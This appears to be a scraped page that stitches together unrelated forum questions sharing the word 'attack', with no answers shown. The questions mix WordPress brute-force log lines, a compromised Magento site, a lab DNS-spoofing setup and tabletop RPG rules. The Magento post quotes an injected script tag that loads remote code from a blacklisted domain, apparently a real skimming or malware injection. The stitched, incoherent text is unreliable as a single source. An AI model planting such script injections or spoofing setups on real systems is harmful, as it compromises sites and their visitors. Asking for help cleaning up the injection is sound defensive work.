How to defend against brute force attack on wp-login.php? [duplicate]

This question already has an answer here:

  • How to protect WordPress from brute-force attacks? 3 answers

Today our site is getting a lot of spam requests. Based on /var/log/nginx/access.log they look like a brute force attack:

103.129.222.98 - - [22/Jul/2019:19:32:34 +0100] "POST /wp-login.php HTTP/1.1" 403 1627 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 18.224.93.56 - - [22/Jul/2019:19:33:11 +0100] "POST /wp-login.php HTTP/1.1" 499 1626 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 67.205.140.232 - - [22/Jul/2019:19:33:44 +0100] "GET /wp-login.php HTTP/1.1" 502 1627 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 

There are so many of these, it is making it impossible to access the website. Presumably the server is overloaded.

How should we mitigate this attack?

Does a “melee spell attack” use my spellcasting ability, or my Strength?

The spell “Flame Blade” makes a fire sword that you can perform a melee spell attack with. As a druid with higher Wisdom, I would rather have it be based on that than my Strength, but I’m not sure if I would use my Wisdom or Strength, considering it is a ‘melee spell attack.

Would I use my Wisdom for the melee spell attack from Flame Blade, or my Strength? Cause I feel like if it’s based on Strength, there’s no real need for the spell for a druid.

Does Holy Water deal damage on a failed attack roll?

The text of Holy Water states:

As an action, you can splash the contents of this flask onto a creature within 5 feet of you or throw it up to 20 feet, shattering it on impact. In either case, make a ranged attack against a target creature, treating the holy water as an improvised weapon. If the target is a fiend or undead, it takes 2d6 radiant damage.

In using it as a thrown weapon, the steps are such: 1) make a ranged attack against a target creature as a improvised weapon and 2) if the target is a fiend or undead, deal 2d6 radiant damage. Step 2 doesn’t specifically require that the ranged attack in Step 1 succeed, only that an attack roll is made. Does this mean that Holy Water deals 2d6 radiant damage to undead and fiends even if the attack roll fails?

Magento cloud hosted M2 EE site compromised and got malware attack

Today i noticed in my client’s magento 2 cloud hosted enterprise edition site is compromised. In footer hacker added some link along with following url:

  <script src="https://write-cdn.com/mysiteurl/"></script> 

As i am maintaining their environment when i saw that link i was curious what is that. When i opened that link it first attempt it showed some JS related encrypted code so i got some doubt about it.

Did perform scan in tools like sucuri and foregenix to verify site is malware infected. Both scanner showed result clean but when i ran http://write-cdn.com/ in sucuri it gave me red alert that domain is blacklisted for malware activities.

I removed that code from mysite and performed Db scan by checking blocks, pages, core_config_data and few other tables. did check code using grep linux command to find out but didn’t find any clue.

I want to know how that code injected in site. I did check admin logs, magento logs, nginx logs. Also created magento support ticket but those guys just useless and giving zero information how someone entered that code. admin access is shared with 2 person and all have secure and 20 character special character password.

Is there any way i can track from where that malware code came?
Is there any tool or way i can quickly scan and monitor for magento?

Is there any way i check who changed into db directly like logging or something?

Any help would be appreciated.

What are the correct network settings for VirtualBox VMs to allow DNS spoofing attack [on hold]

I need to implement DNS spoofing attack usign VMs. My host network is connected to a Wireless network.

I created one Kali Linux machine (the attacker machine) and another Win10 machine (the victim machine).

I need the victim machine to be able to connect to the Internet as well as be reachable to the attacker.

Can any one help me please on the right network configurations to enable this attack?

The attacker needs the Default Gateway and the victim’s IP. How to get the DG address?

If I setup the VMs network settings as NAT, the ettercap can not see them when I sniff the newtork.

If I set up my VMs with host-only network settings, they see each other but they are in a different subnet than the actual Gateway and hence can not connect to the Internet.

Can you please provide the correct network settings to implement DNS spoofing in VMs environment and a host device connected to Wireless network?

Quickened Chill Touch and full attack

Given that, as far as I can understand, the most common interpretation of the spell is that it gives you X charges, and then you are “holding the charge” until you use all the charges to make successful melee touch attacks (plus the first attack after casting the spell) or you cast another spell.

Now, I’m having a few doubts about this spell when you cast it quickened:

  1. Can you make a full attack in the same round?

  2. Do they have to be normal unarmed attacks to make a full attack, or can they all be melee touch attacks?

  3. Do you also make the touch attack given by the spell as soon as you cast it (from what I read, you make the touch attack as part of the spell even when you quicken it)?

Do I have to take the Ready action to make an opportunity attack?

So, a friend and I are in a debate right now about how an opportunity attack works.

From what I understand after reading the handbook, you can only perform an opportunity attack if you use an action to ready a reaction first.

So, for example, I can’t use an opportunity attack without using an action to ready a reaction before simply by the fact that an enemy got out of my melee range, meaning that if I want to make an opportunity attack at one point, I should spend my action not attacking any enemy, and then readying a reaction, which in this case is an opportunity attack.

Am I thinking too far? Can I use an opportunity attack just by seeing an enemy getting out of my melee range?

Does the Otyugh’s Tentacle attack allow a saving throw to avoid being grappled if the attack hits? [duplicate]

This question already has an answer here:

  • Is an Otyugh's grapple different from a standard grapple? 2 answers

Per the Monster Manual’s statblock for the Otyugh (pg 248), a successful tentacle attack results in the following:

If the target is Medium or smaller, it is grappled (escape DC13) and restrained until the grapple ends.

Does the target get a chance to do a save of some kind to avoid being grappled in the first place? I am aware that the target can use an action to escape after being grappled, but is there any way a Medium or smaller creature can avoid being grappled on a successful hit with a tentacle attack?